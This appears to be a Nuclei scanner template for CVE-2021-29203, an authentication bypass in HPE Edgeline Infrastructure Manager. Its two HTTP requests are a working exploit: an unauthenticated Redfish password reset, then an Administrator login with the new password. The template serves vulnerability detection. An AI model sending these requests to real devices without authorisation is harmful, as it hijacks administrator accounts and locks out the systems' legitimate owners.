id: CVE-2021-29203

info:
  name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
  author: madrobot
  severity: critical
  description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
  reference:
    - https://www.tenable.com/security/research/tra-2021-15
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29203
    cwe-id: CWE-306
    epss-score: 0.9596
    cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: edgeline_infrastructure_manager
  tags: hpe,cve,cve2021,bypass,tenable

http:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"Password":"{{randstr}}"}
      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"
        condition: and

      - type: word
        part: body
        words:
          - "Base.1.0.Created"

      - type: status
        status:
          - 201